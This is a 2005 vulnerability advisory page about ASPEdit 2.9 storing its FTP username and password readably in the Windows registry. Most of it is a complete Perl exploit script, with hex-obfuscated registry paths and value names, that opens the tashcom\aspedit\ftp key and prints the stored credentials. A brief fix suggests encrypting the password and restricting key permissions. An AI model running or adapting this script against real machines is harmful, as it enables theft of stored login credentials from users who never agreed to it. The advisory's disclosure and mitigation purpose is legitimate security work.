ASPEdit FTP Password Disclosure

2005.09.30
Credit: basher13
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


Ogólna skala CVSS: 4.9/10
Znaczenie: 6.9/10
Łatwość wykorzystania: 3.9/10
Wymagany dostęp: Lokalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

Version: ASPEdit 2.9 Operating System: - All Windows Typical software: - Shareware Severity Flaw: - high Description: ASPEdit is a powerfulActive Server Pages and HTML editor with full support for Visual BasicScript, Perl, Cold-fusion, PHP3, MIVA ,HDML, WML and Style sheets Vulnerability: A stored for administration password are captured at the Registry Editor,this could local user/guest to see then retrive the password as they have privillage to open registry editor by search specified vulnerable registry values. Exploit: #!usr/bin/perl # # ASPEdit FTP Password Disclosure Exploit # --------------------------------------- # Infam0us Gr0up - Securiti Research # # Info: infamous.2hell.com # Vendor URL: http://www.tashcom.co.uk/aspedit # use Win32::Registry; print "\nASPEdit FTP Password Disclosure Exploit\n"; print "---------------------------------------\n\n"; print "Registrie: HLKM\\SOFTWARE\\tashcom\\aspedit\\ftp\n"; sleep(1); $usr = "\x66\x74\x70\x5f\x75\x73\x65\x72"; $pas = "\x66\x74\x70\x5f\x70\x61\x73\x73\x77\x6f\x64"; $nutt = "\x53\x4f\x46\x54\x57\x41\x52\x45\x5c\x5c". "\x74\x61\x73\x68\x63\x6f\x6d\x5c\x5c\x61". "\x73\x70\x65\x64\x69\x74\x5c\x5c\x66\x74\x70"; print "[+] Start searching..\n"; print "[+] Finding username .."; my $user; $::HKEY_LOCAL_MACHINE->Open("$nutt", $user) or die "Can't open username value: $^E"; sleep(1); print "[OK]\n"; print "[+] Query value username.."; my ($type, $value); $user->QueryValueEx("$usr", $type, $value) or die "No such user: $^E"; sleep(1); print "[OK]\n"; print "[+] Finding password .."; my $pass; $::HKEY_LOCAL_MACHINE->Open("$nutt", $pass) or die "Can't open password value: $^E"; sleep(1); print "[OK]\n"; print "[+] Query value password.."; my ($type1, $value2); $pass->QueryValueEx("$pas", $type1, $value2) or die "No such password: $^E"; sleep(2); print "[OK]\n"; print "[+] Retrive data registry..\n"; sleep(1); print "[*] User: $value\n"; print "[*] Password: $value2\n"; Solution: On the registry Editor changes the registry path then try to encrypt the password,it more safety. Also set them whit permission(Advanced Security Setting),can be found by rigth click the 'key'value then choose 'permission'. Vendor URL: Mail - bugs@tashcom.com WWW - http://www.tashcom.com Published: basher13 (Infam0us Gr0up - Securiti Research) basher13@linuxmail.org / infamous.2hell.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top